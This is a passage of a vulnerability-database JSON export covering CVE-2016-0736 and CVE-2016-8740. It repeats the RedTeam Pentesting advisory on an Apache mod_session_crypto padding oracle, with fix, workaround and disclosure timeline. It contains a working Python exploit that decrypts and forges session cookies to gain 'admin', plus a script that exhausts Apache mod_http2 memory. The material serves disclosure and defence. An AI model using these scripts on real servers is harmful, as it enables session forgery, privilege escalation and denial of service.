session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\\\r\nzmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nyour username is admin\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nUse a different means to store the session, e.g. in a database by using\r\nmod_session_dbd.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to Apache HTTP version 2.4.25 (see [2]).\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nApplications which use mod_session_crypto usually store sensitive values\r\nin the session and rely on an attacker's inability to decrypt or modify\r\nthe session. Successful exploitation of the Padding Oracle vulnerability\r\nsubverts this mechanism and allows to construct sessions with arbitrary\r\nattacker-specified content. Depending on the application this may\r\ncompletely subvert the application's security. Therefore, this\r\nvulnerability poses a high risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2016-01-11 Vulnerability identified\r\n2016-01-12 Customer approved disclosure to vendor\r\n2016-01-12 CVE number requested\r\n2016-01-20 Vendor notified\r\n2016-01-22 Vendor confirmed the vulnerability\r\n2016-02-03 Vendor provided patch\r\n2016-02-04 Apache Security Team assigned CVE number\r\n2016-03-03 Requested status update from vendor, no response\r\n2016-05-02 Requested status update from vendor, no response\r\n2016-07-14 Requested status update and roadmap from vendor\r\n2016-07-21 Vendor confirms working on a new released and inquired whether the\r\n patch fixes the vulnerability\r\n2016-07-22 RedTeam confirms\r\n2016-08-24 Requested status update from vendor\r\n2016-08-29 Vendor states that there is no concrete timeline\r\n2016-12-05 Vendor announces a release\r\n2016-12-20 Vendor released fixed version\r\n2016-12-23 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://github.com/mwielgoszewski/python-paddingoracle\r\n[2] http://httpd.apache.org/security/vulnerabilities_24.html\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests performed by a\r\nteam of specialised IT-security experts. Hereby, security weaknesses in\r\ncompany networks or products are uncovered and can be fixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at:\r\nhttps://www.redteam-pentesting.de/\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40961/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache 2.4.23 mod_http2 - Denial of Service", "edition": 1, "published": "2016-12-12T00:00:00", "title": "Apache 2.4.23 mod_http2 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8740"], "modified": "2016-12-12T00:00:00", "id": "EXPLOITPACK:2666FB0676B4B582D689921651A30355", "href": "", "sourceData": "#!/usr/bin/python\n\n\"\"\" source : http://seclists.org/bugtraq/2016/Dec/3\nThe mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.(https://access.redhat.com/security/cve/cve-2016-8740)\n\nUsage : cve-2016-8740.py [HOST] [PORT]\n\"\"\"\n\nimport sys\nimport struct\nimport socket\n\nHOST = sys.argv[1]\nPORT = int(sys.argv[2])\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\n\n# https://http2.github.io/http2-spec/#ConnectionHeader\ns.sendall('PRI * HTTP/2.0\\r\\n\\r\\nSM\\r\\n\\r\\n')\n\n# https://http2.github.io/http2-spec/#SETTINGS\nSETTINGS = struct.pack('3B', 0x00, 0x00, 0x00) # Length\nSETTINGS += struct.pack('B', 0x04) # Type\nSETTINGS += struct.pack('B', 0x00)\nSETTINGS += struct.pack('>I', 0x00000000)\ns.sendall(SETTINGS)\n\n# https://http2.github.io/http2-spec/#HEADERS\nHEADER_BLOCK_FRAME = '\\x82\\x84\\x86\\x41\\x86\\xa0\\xe4\\x1d\\x13\\x9d\\x09\\x7a\\x88\\x25\\xb6\\x50\\xc3\\xab\\xb6\\x15\\xc1\\x53\\x03\\x2a\\x2f\\x2a\\x40\\x83\\x18\\xc6\\x3f\\x04\\x76\\x76\\x76\\x76'\nHEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length\nHEADERS += struct.pack('B', 0x01) # Type\nHEADERS += struct.pack('B', 0x00) # Flags\nHEADERS += struct.pack('>I', 0x00000001) # Stream ID\ns.sendall(HEADERS + HEADER_BLOCK_FRAME)\n\n# Sending CONTINUATION frames for leaking memory\n# https://http2.github.io/http2-spec/#CONTINUATION\nwhile True:\n HEADER_BLOCK_FRAME = '\\x40\\x83\\x18\\xc6\\x3f\\x04\\x76\\x76\\x76\\x76'\n HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length\n HEADERS += struct.pack('B', 0x09) # Type\n HEADERS += struct.pack('B', 0x01) # Flags\n HEADERS += struct.pack('>I', 0x00000001) # Stream ID\n s.sendall(HEADERS + HEADER_BLOCK_FRAME)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache mod_session_crypto - Padding Oracle", "edition": 1, "published": "2016-12-23T00:00:00", "title": "Apache mod_session_crypto - Padding Oracle", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0736"], "modified": "2016-12-23T00:00:00", "id": "EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7", "href": "", "sourceData": "'''\nAdvisory: Padding Oracle in Apache mod_session_crypto\n\nDuring a penetration test, RedTeam Pentesting discovered a Padding\nOracle vulnerability in mod_session_crypto of the Apache web server.\nThis vulnerability can be exploited to decrypt the session data and even\nencrypt attacker-specified data.\n\n\nDetails\n=======\n\nProduct: Apache HTTP Server mod_session_crypto\nAffected Versions: 2.3 to 2.5\nFixed Versions: 2.4.25\nVulnerability Type: Padding Oracle\nSecurity Risk: high\nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html\nVendor Status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt\nAdvisory Status: published\nCVE: CVE-2016-0736\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736\n\n\nIntroduction\n============\n\nThe module mod_session_crypto of the Apache HTTP Server can be used in\nconjunction with the modules mod_session and mod_session_cookie to store\nsession data in an encrypted cookie within the users' browsers. This\navoids server-side session state so that incoming HTTP requests can be\neasily distributed amongst a number of application web servers which do\nnot need to share session state.\n\n\nMore Details\n============\n\nThe module mod_session_crypto uses symmetric cryptography to encrypt and\ndecrypt session data and uses mod_session to store the encrypted data in\na cookie (usually called \"session\") within the user's browser. The\ndecrypted session is then made available to the application in an\nenvironment variable (in case of a CGI script) or in a custom HTTP\nrequest header. The application can add a custom HTTP response header\n(usually \"X-Replace-Session\") which instructs the HTTP server to replace\nthe session's content with the value of the header. Detailed\ninstructions to set up mod_session and mod_session_crypto can be found\nin the documentation:\nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples\n\nThe module mod_session_crypto is configured to use either 3DES or AES\nwith various key sizes, defaulting to AES256. Encryption is handled by\nthe function \"encrypt_string\":\n\nmodules/session/mod_session_crypto.c\n------------------------------------------------------------------------\n/**\n * Encrypt the string given as per the current config.\n *\n * Returns APR_SUCCESS if successful.\n */\nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,\n session_crypto_dir_conf *dconf, const char *in, char **out)\n{\n[...]\n apr_crypto_key_t *key = NULL;\n[...]\n const unsigned char *iv = NULL;\n[...]\n\n /* use a uuid as a salt value, and prepend it to our result */\n apr_uuid_get(&salt);\n\n[...]\n\n res = apr_crypto_passphrase(&key, &ivSize, passphrase,\n strlen(passphrase),\n (unsigned char *) (&salt), sizeof(apr_uuid_t),\n *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);\n\n[...]\n\n res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);\n[...]\n res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,\n strlen(in), block);\n[...]\n res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);\n[...]\n\n /* prepend the salt and the iv to the result */\n combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));\n memcpy(combined, &salt, sizeof(apr_uuid_t));\n memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);\n memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);\n\n /* base64 encode the result */\n base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +\n sizeof(apr_uuid_t) + 1)\n * sizeof(char));\n[...]\n return res;\n}\n------------------------------------------------------------------------\n\nThe source code shows that an encryption key is derived from the\nconfigured password and a randomly chosen salt by calling the function\n\"apr_crypto_passphrase\". This function internally uses PBKDF2 to derive\nthe key. The data is then encrypted and the salt and IV prepended to the\nencrypted data. Before returning to the caller, the result is encoded as\nbase64.\n\nThis procedure does not guarantee integrity of the ciphertext, so the\nApache module is unable to detect whether a session sent back to the\nserver has been tampered with. Depending on the application this often\nmeans that attackers are able to exploit a Padding Oracle vulnerability.\nThis allows decrypting the session and encrypting arbitrary data chosen\nby the attacker.\n\n\nProof of Concept\n================\n\nThe vulnerability can be reproduced as follows. First, the modules\nmod_session, mod_session_crypto and mod_session_cookie are enabled and\nconfigured:\n\n------------------------------------------------------------------------\nSession On\nSessionEnv On\nSessionCookieName session path=/\nSessionHeader X-Replace-Session\nSessionCryptoPassphrase RedTeam\n------------------------------------------------------------------------\n\nIn addition, CGI scripts are enabled for a folder and the following CGI\nscript is saved as \"status.rb\" and is made available to clients:\n\n------------------------------------------------------------------------\n#!/usr/bin/env ruby\n\nrequire 'cgi'\n\ncgi = CGI.new\ndata = CGI.parse(ENV['HTTP_SESSION'])\n\nif data.has_key? 'username'\n puts\n puts \"your username is %s\" % data['username']\n exit\nend\n\nputs \"X-Replace-Session: username=guest&timestamp=\" + Time.now.strftime(\"%s\")\nputs\nputs \"not logged in\"\n------------------------------------------------------------------------\n\nOnce the CGI script is correctly set up, the command-line HTTP client curl\ncan be used to access it:\n\n------------------------------------------------------------------------\n$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb\nHTTP/1.1 200 OK\nDate: Tue, 19 Jan 2016 13:23:19 GMT\nServer: Apache/2.4.10 (Ubuntu)\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\nCache-Control: no-cache\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\nTransfer-Encoding: chunked\nContent-Type: application/x-ruby\n\nnot logged in\n------------------------------------------------------------------------\n\nThe example shows that a new encrypted cookie with the name \"session\" is\nreturned, and the response body contains the text \"not logged in\".\nCalling the script again with the cookie just returned reveals that the\nusername in the session is set to \"guest\":\n\n------------------------------------------------------------------------\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \\\nhttp://127.0.0.1:8080/cgi-bin/status.rb\n\nyour username is guest\n------------------------------------------------------------------------\n\nSending a modified cookie ending in \"u=\" instead of \"U=\" will invalidate\nthe padding at the end of the ciphertext, so the session cannot be\ndecrypted correctly and is therefore not passed to the CGI script, which\nreturns the text \"not logged in\" again:\n\n------------------------------------------------------------------------\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \\\nhttp://127.0.0.1:8080/cgi-bin/status.rb\n\nnot logged in\n------------------------------------------------------------------------\n\nThis verifies the existence of the Padding Oracle vulnerability. The\nPython library[1] python-paddingoracle was then used to implement\ndecrypting the session by exploiting the Padding Oracle vulnerability.\n\nexploit.py\n------------------------------------------------------------------------\n'''\n\nfrom paddingoracle import BadPaddingException, PaddingOracle\nfrom base64 import b64encode, b64decode\nimport requests\n\nclass PadBuster(PaddingOracle):\n def __init__(self, valid_cookie, **kwargs):\n super(PadBuster, self).__init__(**kwargs)\n self.wait = kwargs.get('wait', 2.0)\n self.valid_cookie = valid_cookie\n\n def oracle(self, data, **kwargs):\n v = b64encode(self.valid_cookie+data)\n\n response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',\n cookies=dict(session=v), stream=False, timeout=5, verify=False)\n\n if 'username' in response.content:\n logging.debug('No padding exception raised on %r', v)\n return\n\n raise BadPaddingException\n\nif __name__ == '__main__':\n import logging\n import sys\n\n if not sys.argv[2:]:\n print 'Usage: [encrypt|decrypt] <session value> <plaintext>'\n sys.exit(1)\n\n logging.basicConfig(level=logging.WARN)\n mode = sys.argv[1]\n session = b64decode(sys.argv[2])\n padbuster = PadBuster(session)\n\n if mode == \"decrypt\":\n cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])\n print('Decrypted session:\\n%r' % cookie)\n elif mode == \"encrypt\":\n key = session[0:16]\n plaintext = sys.argv[3]\n\n s = padbuster.encrypt(plaintext, block_size=16)\n\n data = b64encode(key+s[0:len(s)-16])\n print('Encrypted session:\\n%s' % data)\n else:\n print \"invalid mode\"\n sys.exit(1)\n\n'''\n------------------------------------------------------------------------\n\nThis Python script can then be used to decrypt the session:\n\n------------------------------------------------------------------------\n$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=\nDecrypted session:\nb'username=guest&timestamp=1453282205\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r'\n\nreal 6m43.088s\nuser 0m15.464s\nsys 0m0.976s\n------------------------------------------------------------------------\n\nIn this sample application, the username and a timestamp are included in\nthe session data. The Python script can also be used to encrypt a new\nsession containing the username \"admin\":\n\n------------------------------------------------------------------------\n$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\\\nRU= username=admin\n\nEncrypted session:\nsxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY\n\nreal3m38.002s\nusers0m8.536s\nsys0m0.512s\n\n------------------------------------------------------------------------\n\nSending this newly encrypted session to the server shows that the\nusername is now \"admin\":\n\n------------------------------------------------------------------------\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\\\nzmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb\n\nyour username is admin\n------------------------------------------------------------------------\n\n\nWorkaround\n==========\n\nUse a different means to store the session, e.g. in a database by using\nmod_session_dbd.\n\n\nFix\n===\n\nUpdate to Apache HTTP version 2.4.25 (see [2]).\n\n\nSecurity Risk\n=============\n\nApplications which use mod_session_crypto usually store sensitive values\nin the session and rely on an attacker's inability to decrypt or modify\nthe session. Successful exploitation of the Padding Oracle vulnerability\nsubverts this mechanism and allows to construct sessions with arbitrary\nattacker-specified content. Depending on the application this may\ncompletely subvert the application's security. Therefore, this\nvulnerability poses a high risk.\n\n\nTimeline\n========\n\n2016-01-11 Vulnerability identified\n2016-01-12 Customer approved disclosure to vendor\n2016-01-12 CVE number requested\n2016-01-20 Vendor notified\n2016-01-22 Vendor confirmed the vulnerability\n2016-02-03 Vendor provided patch\n2016-02-04 Apache Security Team assigned CVE number\n2016-03-03 Requested status update from vendor, no response\n2016-05-02 Requested status update from vendor, no response\n2016-07-14 Requested status update and roadmap from vendor\n2016-07-21 Vendor confirms working on a new released and inquired whether the\n patch fixes the vulnerability\n2016-07-22 RedTeam confirms\n2016-08-24 Requested status update from vendor\n2016-08-29 Vendor states that there is no concrete timeline\n2016-12-05 Vendor announces a release\n2016-12-20 Vendor released fixed version\n2016-12-23 Advisory released\n\n\nReferences\n==========\n\n[1] https://github.com/mwielgoszewski/python-paddingoracle\n[2] http://httpd.apache.org/security/vulnerabilities_24.html\n\n\nRedTeam Pentesting GmbH\n=======================\n\nRedTeam Pentesting offers individual penetration tests performed by a\nteam of specialised IT-security experts. Hereby, security weaknesses in\ncompany networks or products are uncovered and can be fixed immediately.\n\nAs there are only few experts in this field, RedTeam Pentesting wants to\nshare its knowledge and enhance the public knowledge with research in\nsecurity-related areas. The results are made available as public\nsecurity advisories.\n\nMore information about RedTeam Pentesting can be found at:\nhttps://www.redteam-pentesting.de/\n'''", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "myhack58": [{"lastseen": "2017-01-05T15:00:52", "bulletinFamily": "info", "cvelist": ["CVE-2016-0736"], "edition": 1, "description": "Recently, security researchers at the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)Apache mod_session_crypto module found a Padding Oracle vulnerability. An attacker can exploit this vulnerability to decrypt the session data, and even can be used to specify the data to be encrypted. \nVulnerability details\nProduct: Apache HTTP Server mod_session_crypto \nAffected version: 2. 3 to 2. 5 \nHas been fixed version: 2.4.25 \nVulnerability type: the Padding Oracle \nSecurity risk: high \nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html \nVendor status: already released fix version\nBulletin web site: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt \nBulletin status: published\nCVE: CVE-2016-0736 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736 \nIntroduction \nPeople can be combined using the Apache HTTP server mod_session_crypto module, the mod_session module and mod_session_cookie modules, the session data is stored to the user's browser in encrypted Cookies. This avoids the use of server-side session state, so as to facilitate the incoming HTTP request is assigned to a plurality of not need to share the session state of the application[the Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)above. \nMore details\nModule mod_session_crypto using symmetric encryption techniques to encrypt and decrypt session data, and use the mod_session sends the encrypted after the data is stored to the user browser's Cookie, usually called\u201csession\u201d. Thereafter, the decryption of the session for the application's environment variable, or a custom HTTP request header. The application can add custom HTTP response header is usually\u201cX-Replace-Session\u201d, the HTTP server uses the header value to replace the session content. Set mod_session and mod_session_crypto of specific methods please refer to the following document: \nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples \nModule mod_session_crypto is configured to use 3DES or AES encryption algorithm, key size, as the case may be, the default is AES256\u3002 Specific the encryption work is done by the function\u201cencrypt_string\u201d: \nmodules/session/mod_session_crypto. c \n/** \n* Encrypt the string given as per the current config. \n* \n* Returns APR_SUCCESS if successful. \n*/ \nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f, \nsession_crypto_dir_conf *dconf, const char *in, char **out) \n{ \n[...] \napr_crypto_key_t *key = NULL; \n[...] \nconst unsigned char *iv = NULL; \n[...] \n/* use a uuid as a salt value, and prepend it to our result */ \napr_uuid_get(&amp;salt); \n[...] \nres = apr_crypto_passphrase(&amp;key, &amp;ivSize, passphrase, \nstrlen(passphrase), \n(unsigned char *) (&amp;salt), sizeof(apr_uuid_t), \n*cipher, APR_MODE_CBC, 1, 4096, f, r-&gt;pool); \n[...] \nres = apr_crypto_block_encrypt_init(&amp;block, &amp;iv, key, &amp;blockSize, r-&gt;pool); \n[...] \nres = apr_crypto_block_encrypt(&amp;encrypt, &amp;encryptlen, (unsigned char *)in, \nstrlen(in), block); \n[...] \nres = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &amp;tlen, block); \n[...] \n/* prepend the salt and the iv to the result */ \ncombined = apr_palloc(r-&gt;pool, ivSize + encryptlen + sizeof(apr_uuid_t)); \nmemcpy(combined, &amp;salt, sizeof(apr_uuid_t)); \nmemcpy(combined + sizeof(apr_uuid_t), iv, ivSize); \nmemcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen); \n/* base64 encode the result */ \nbase64 = apr_palloc(r-&gt;pool, apr_base64_encode_len(ivSize + encryptlen + \nsizeof(apr_uuid_t) + 1) \n* sizeof(char)); \n[...] \nreturn res; \n} \nThe source code shows the encryption key is based on the configuration of the password and a randomly selected salt by calling the function\u201capr_crypto_passphrase\u201dgenerated. This function is used internally by PBKDF2 to generate the key. Then, the data is encrypted, and the salt and the IV into the encryption after the data front. Before returning, the function of the encrypted data is base64 encoding process. \nSince this process can not guarantee that the ciphertext's integrity, so the Apache module can't detect the session back to the server before whether it has been tampered with. This often means that the attacker can use the Padding Oracle attack, i.e., the session is decrypted and the encrypted specifying any data. \nProof-of-concept code\uff08POC\uff09 \nBelow we reproduce the security vulnerability. First, enable the module mod_session, the mod_session_crypto and mod_session_cookie, and as shown in the configuration: \nSession On \nSessionEnv On \nSessionCookieName session path=/ \nSessionHeader X-Replace-Session \nSessionCryptoPassphrase RedTeam \nIn addition, for the folder to write one of the following shown in the CGI script, then the CGI script is saved as\u201cstatus. rb\u201d, for the client to use: \n#!/ usr/bin/env ruby \nrequire 'cgi' \n\n\n**[1] [[2]](<82679_2.htm>) [[3]](<82679_3.htm>) [next](<82679_2.htm>)**\n", "modified": "2017-01-05T00:00:00", "published": "2017-01-05T00:00:00", "id": "MYHACK58:62201782679", "href": "http://www.myhack58.com/Article/html/3/62/2017/82679.htm", "type": "myhack58", "title": "Apache-mod_session_crypto module in the Padding Oracle vulnerability analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-19T03:14:20", "description": "Apache mod_session_crypto versions 2.3 through 2.5 suffer form a padding oracle vulnerability.", "edition": 1, "published": "2016-12-23T00:00:00", "type": "zdt", "title": "Apache mod_session_crypto - Padding Oracle Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0736"], "modified": "2016-12-23T00:00:00", "href": "https://0day.today/exploit/description/26574", "id": "1337DAY-ID-26574", "sourceData": "Padding Oracle in Apache mod_session_crypto\r\n\r\nDuring a penetration test, RedTeam Pentesting discovered a Padding\r\nOracle vulnerability in mod_session_crypto of the Apache web server.\r\nThis vulnerability can be exploited to decrypt the session data and even\r\nencrypt attacker-specified data.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Apache HTTP Server mod_session_crypto\r\nAffected Versions: 2.3 to 2.5\r\nFixed Versions: 2.4.25\r\nVulnerability Type: Padding Oracle\r\nSecurity Risk: high\r\nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt\r\nAdvisory Status: published\r\nCVE: CVE-2016-0736\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe module mod_session_crypto of the Apache HTTP Server can be used in\r\nconjunction with the modules mod_session and mod_session_cookie to store\r\nsession data in an encrypted cookie within the users' browsers. This\r\navoids server-side session state so that incoming HTTP requests can be\r\neasily distributed amongst a number of application web servers which do\r\nnot need to share session state.\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe module mod_session_crypto uses symmetric cryptography to encrypt and\r\ndecrypt session data and uses mod_session to store the encrypted data in\r\na cookie (usually called \"session\") within the user's browser. The\r\ndecrypted session is then made available to the application in an\r\nenvironment variable (in case of a CGI script) or in a custom HTTP\r\nrequest header. The application can add a custom HTTP response header\r\n(usually \"X-Replace-Session\") which instructs the HTTP server to replace\r\nthe session's content with the value of the header. Detailed\r\ninstructions to set up mod_session and mod_session_crypto can be found\r\nin the documentation:\r\nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples\r\n\r\nThe module mod_session_crypto is configured to use either 3DES or AES\r\nwith various key sizes, defaulting to AES256. Encryption is handled by\r\nthe function \"encrypt_string\":\r\n\r\nmodules/session/mod_session_crypto.c\r\n------------------------------------------------------------------------\r\n/**\r\n * Encrypt the string given as per the current config.\r\n *\r\n * Returns APR_SUCCESS if successful.\r\n */\r\nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,\r\n session_crypto_dir_conf *dconf, const char *in, char **out)\r\n{\r\n[...]\r\n apr_crypto_key_t *key = NULL;\r\n[...]\r\n const unsigned char *iv = NULL;\r\n[...]\r\n\r\n /* use a uuid as a salt value, and prepend it to our result */\r\n apr_uuid_get(&salt);\r\n\r\n[...]\r\n\r\n res = apr_crypto_passphrase(&key, &ivSize, passphrase,\r\n strlen(passphrase),\r\n (unsigned char *) (&salt), sizeof(apr_uuid_t),\r\n *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);\r\n\r\n[...]\r\n\r\n res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);\r\n[...]\r\n res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,\r\n strlen(in), block);\r\n[...]\r\n res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);\r\n[...]\r\n\r\n /* prepend the salt and the iv to the result */\r\n combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));\r\n memcpy(combined, &salt, sizeof(apr_uuid_t));\r\n memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);\r\n memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);\r\n\r\n /* base64 encode the result */\r\n base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +\r\n sizeof(apr_uuid_t) + 1)\r\n * sizeof(char));\r\n[...]\r\n return res;\r\n}\r\n------------------------------------------------------------------------\r\n\r\nThe source code shows that an encryption key is derived from the\r\nconfigured password and a randomly chosen salt by calling the function\r\n\"apr_crypto_passphrase\". This function internally uses PBKDF2 to derive\r\nthe key. The data is then encrypted and the salt and IV prepended to the\r\nencrypted data. Before returning to the caller, the result is encoded as\r\nbase64.\r\n\r\nThis procedure does not guarantee integrity of the ciphertext, so the\r\nApache module is unable to detect whether a session sent back to the\r\nserver has been tampered with. Depending on the application this often\r\nmeans that attackers are able to exploit a Padding Oracle vulnerability.\r\nThis allows decrypting the session and encrypting arbitrary data chosen\r\nby the attacker.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe vulnerability can be reproduced as follows. First, the modules\r\nmod_session, mod_session_crypto and mod_session_cookie are enabled and\r\nconfigured:\r\n\r\n------------------------------------------------------------------------\r\nSession On\r\nSessionEnv On\r\nSessionCookieName session path=/\r\nSessionHeader X-Replace-Session\r\nSessionCryptoPassphrase RedTeam\r\n------------------------------------------------------------------------\r\n\r\nIn addition, CGI scripts are enabled for a folder and the following CGI\r\nscript is saved as \"status.rb\" and is made available to clients:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env ruby\r\n\r\nrequire 'cgi'\r\n\r\ncgi = CGI.new\r\ndata = CGI.parse(ENV['HTTP_SESSION'])\r\n\r\nif data.has_key? 'username'\r\n puts\r\n puts \"your username is %s\" % data['username']\r\n exit\r\nend\r\n\r\nputs \"X-Replace-Session: username=guest&timestamp=\" + Time.now.strftime(\"%s\")\r\nputs\r\nputs \"not logged in\"\r\n------------------------------------------------------------------------\r\n\r\nOnce the CGI script is correctly set up, the command-line HTTP client curl\r\ncan be used to access it:\r\n\r\n------------------------------------------------------------------------\r\n$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Jan 2016 13:23:19 GMT\r\nServer: Apache/2.4.10 (Ubuntu)\r\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\r\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\r\nCache-Control: no-cache\r\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\r\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\r\nTransfer-Encoding: chunked\r\nContent-Type: application/x-ruby\r\n\r\nnot logged in\r\n------------------------------------------------------------------------\r\n\r\nThe example shows that a new encrypted cookie with the name \"session\" is\r\nreturned, and the response body contains the text \"not logged in\".\r\nCalling the script again with the cookie just returned reveals that the\r\nusername in the session is set to \"guest\":\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\r\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \\\r\nhttp://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nyour username is guest\r\n------------------------------------------------------------------------\r\n\r\nSending a modified cookie ending in \"u=\" instead of \"U=\" will invalidate\r\nthe padding at the end of the ciphertext, so the session cannot be\r\ndecrypted correctly and is therefore not passed to the CGI script, which\r\nreturns the text \"not logged in\" 